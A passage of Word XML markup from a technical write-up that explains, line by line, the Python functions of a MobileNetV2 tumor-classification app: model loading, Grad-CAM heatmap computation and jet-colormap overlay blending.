          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Inspects the model's layer list to dynamically find the sub-model layer containing the MobileNetV2 base (avoiding hardcoded layer index bugs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Parameters:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> None.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Input Types:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files on disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Return Value &amp; Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tuple of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(keras.src.models.functional.Functional, keras.src.models.functional.Functional)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> If neither file exists on disk, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>model_path.exists()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> evaluates to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.error()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is rendered, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(None, None)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is returned.</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Block 3: The Grad-CAM Calculation Engine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def compute_gradcam(img_tensor, model, base_model, pred_index=None):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Computes Grad-CAM heatmap using the last convolutional activations of MobileNetV2.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    prep_img = tf.keras.applications.mobilenet_v2.preprocess_input(img_tensor)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    with tf.GradientTape() as tape:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        conv_features = base_model(prep_img, training=False)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        tape.watch(conv_features)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        # Pass features through the classification head layers</w:t>
              <w:br/>
              <w:t xml:space="preserve">        x = conv_features</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for layer in model.layers[3:]:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            x = layer(x, training=False)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        preds = x</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        if pred_index is None:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            pred_index = tf.argmax(preds[0])</w:t>
              <w:br/>
              <w:t xml:space="preserve">        class_score = preds[:, pred_index]</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    # Compute gradients of top class score with respect to feature maps</w:t>
              <w:br/>
              <w:t xml:space="preserve">    grads = tape.gradient(class_score, conv_features)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pooled_grads = tf.reduce_mean(grads, axis=(0, 1, 2))</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    # Weight feature maps and apply ReLU</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap = conv_features[0] @ pooled_grads[..., tf.newaxis]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap = tf.squeeze(heatmap)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap = tf.maximum(heatmap, 0) / (tf.math.reduce_max(heatmap) + 1e-10)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    return heatmap.numpy(), preds[0].numpy(), int(pred_index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>prep_img = ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Scales pixel values from $[0.0, 255.0]$ to $[-1.0, 1.0]$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with tf.GradientTape() as tape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Begins recording automatic differentiation operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>conv_features = base_model(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Feeds the image into MobileNetV2, returning feature maps of shape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 7, 7, 1280)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tape.watch(conv_features)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Explicitly instructs the tape to track gradients with respect to this intermediate activation tensor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for layer in model.layers[3:]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Forwards the spatial activations through Global Average Pooling, Batch Normalization, Dropout, Dense(128), and the Softmax output layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pred_index = tf.argmax(preds[0])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Identifies the winning class index ($0, 1, 2,$ or $3$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_score = preds[:, pred_index]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Isolates the scalar activation score of the predicted class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grads = tape.gradient(class_score, conv_features)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Backpropagates through the head layers to compute $\frac{\partial y^c}{\partial A^k}$. Gradient tensor shape: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 7, 7, 1280)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pooled_grads = tf.reduce_mean(grads, axis=(0, 1, 2))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Averages gradients over batch, height, and width to compute importance weights $\alpha_k^c$ (1D vector of length 1,280).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>heatmap = conv_features[0] @ pooled_grads[..., tf.newaxis]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Matrix multiplication taking the linear combination of the 1,280 feature maps weighted by their importance scores. Resulting shape: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(7, 7, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>heatmap = tf.maximum(heatmap, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The ReLU operation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discards features that negatively correlate with this tumor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>... / (tf.math.reduce_max(heatmap) + 1e-10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Normalizes intensities into the range $[0.0, 1.0]$. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1e-10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> prevents zero-division errors on blank images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Input Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>img_tensor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: 4D float tensor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 224, 224, 3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Full compiled Keras model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>base_model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Sub-model referencing MobileNetV2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pred_index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Optional target class index (defaults to winning class).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Return Values:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>heatmap.numpy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: 2D NumPy float array </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(7, 7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>preds[0].numpy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1D NumPy float array </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(4,)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> representing class probabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int(pred_index)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Integer index of predicted class.</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Block 4: Diagnostic Overlay Blending</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def create_superimposed_overlay(original_rgb, heatmap, alpha=0.45):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Blends the Grad-CAM jet heatmap with the original image.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    h, w, _ = original_rgb.shape</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap_resized = cv2.resize(heatmap, (w, h))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    heatmap_uint8 = np.uint8(255 * heatmap_resized)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    jet_colormap = cv2.applyColorMap(heatmap_uint8, cv2.COLORMAP_JET)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    jet_rgb = cv2.cvtColor(jet_colormap, cv2.COLOR_BGR2RGB)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    superimposed = np.uint8(original_rgb * (1.0 - alpha) + jet_rgb * alpha)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return superimposed, jet_rgb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.resize(heatmap, (w, h))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Upsamples the small $7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 7$ heatmap to the original image dimensions ($224 </w:t>
        <w:tab/>
        <w:t>imes 224$) using bilinear interpolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>heatmap_uint8 = np.uint8(255 * heatmap_resized)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Converts float $[0.0, 1.0]$ to integer range $[0, 255]$ required by OpenCV colormaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.applyColorMap(..., cv2.COLORMAP_JET)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Applies standard thermal colormap (high values = red, medium = yellow/green, low = deep blue). Outputs BGR format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.cvtColor(..., cv2.COLOR_BGR2RGB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Converts OpenCV's BGR order into RGB for correct browser rendering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
